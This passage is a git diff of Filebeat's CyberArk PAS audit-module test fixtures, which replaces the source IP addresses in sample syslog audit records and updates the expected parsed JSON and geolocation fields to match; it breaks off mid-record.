+<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.12","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.session</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category>PSMStatus</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"67.43.156.14","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMLiveSessions</Safe>\n    <File>Root\\PSM-ASR-CYBERARK-WI.LiveSessions</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"81.2.69.143","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:38</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"81.2.69.143","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json
index 2ac071e7963b..a996c2b683b7 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json
@@ -59,7 +59,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:46:48",
         "event.action": "update file category",
         "event.code": "106",
@@ -79,19 +79,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -109,7 +106,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
         "event.action": "update file category",
         "event.code": "106",
@@ -122,25 +119,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1347,
+        "log.offset": 1346,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -155,11 +150,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:26Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Update File Category",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.session</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category>PSMStatus</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.session</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category>PSMStatus</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMRecordings",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:26",
         "event.action": "update file category",
         "event.code": "106",
@@ -172,26 +167,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2007,
+        "log.offset": 2005,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -206,11 +198,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:10:33Z",
         "cyberarkpas.audit.issuer": "PSMApp_ASR-WIN",
         "cyberarkpas.audit.message": "Update File Category",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMLiveSessions</Safe>\n    <File>Root\\PSM-ASR-CYBERARK-WI.LiveSessions</File>\n    <Station>34.66.114.180</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMLiveSessions</Safe>\n    <File>Root\\PSM-ASR-CYBERARK-WI.LiveSessions</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.66.114.180",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 11 12:10:33",
         "event.action": "update file category",
         "event.code": "106",
@@ -223,25 +215,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3611,
+        "log.offset": 3607,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.66.114.180",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "34.66.114.180",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -256,11 +249,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:38Z",
         "cyberarkpas.audit.issuer": "PSMPApp_SSH",
         "cyberarkpas.audit.message": "Update File Category",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:38</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:38</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:38",
         "event.action": "update file category",
         "event.code": "106",
@@ -273,23 +266,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5211,
+        "log.offset": 5203,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log
index d9c83a42d987..5455577e1ef6 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log
@@ -1 +1 @@
-<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:42:20</Timestamp>\n    <IsoTimestamp>2021-03-14T13:42:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>125</MessageID>\n    <Desc>Rename File (Cont.)</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Rename File (Cont.)</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Operating System-UnixSSH-34.71.250.247-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Rename File (Cont.)</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-34.71.250.247-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:42:20</Timestamp>\n    <IsoTimestamp>2021-03-14T13:42:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>125</MessageID>\n    <Desc>Rename File (Cont.)</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Rename File (Cont.)</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Operating System-UnixSSH-81.2.69.143-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Rename File (Cont.)</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-81.2.69.143-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json
index 371f33ab4f8f..d818ec7d8db6 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json
@@ -3,12 +3,12 @@
         "@timestamp": "2021-03-14T13:42:20.000Z",
         "cyberarkpas.audit.action": "Rename File (Cont.)",
         "cyberarkpas.audit.desc": "Rename File (Cont.)",
-        "cyberarkpas.audit.file": "Operating System-UnixSSH-34.71.250.247-PSMConnect",
+        "cyberarkpas.audit.file": "Operating System-UnixSSH-81.2.69.143-PSMConnect",
         "cyberarkpas.audit.gateway_station": "10.0.1.20",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:42:20Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Rename File (Cont.)",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:42:20</Timestamp>\n    <IsoTimestamp>2021-03-14T13:42:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>125</MessageID>\n    <Desc>Rename File (Cont.)</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Rename File (Cont.)</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Operating System-UnixSSH-34.71.250.247-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Rename File (Cont.)</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:42:20</Timestamp>\n    <IsoTimestamp>2021-03-14T13:42:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>125</MessageID>\n    <Desc>Rename File (Cont.)</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Rename File (Cont.)</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Operating System-UnixSSH-81.2.69.143-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Rename File (Cont.)</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
@@ -23,7 +23,7 @@
         "event.module": "cyberarkpas",
         "event.severity": 2,
         "event.timezone": "-02:00",
-        "file.path": "Operating System-UnixSSH-34.71.250.247-PSMConnect",
+        "file.path": "Operating System-UnixSSH-81.2.69.143-PSMConnect",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log
index 3f6ae5f78715..62dfac9663cd 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log
@@ -1 +1 @@
-<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>130</MessageID>\n    <Desc>CPM Disable Password</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Disable Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is 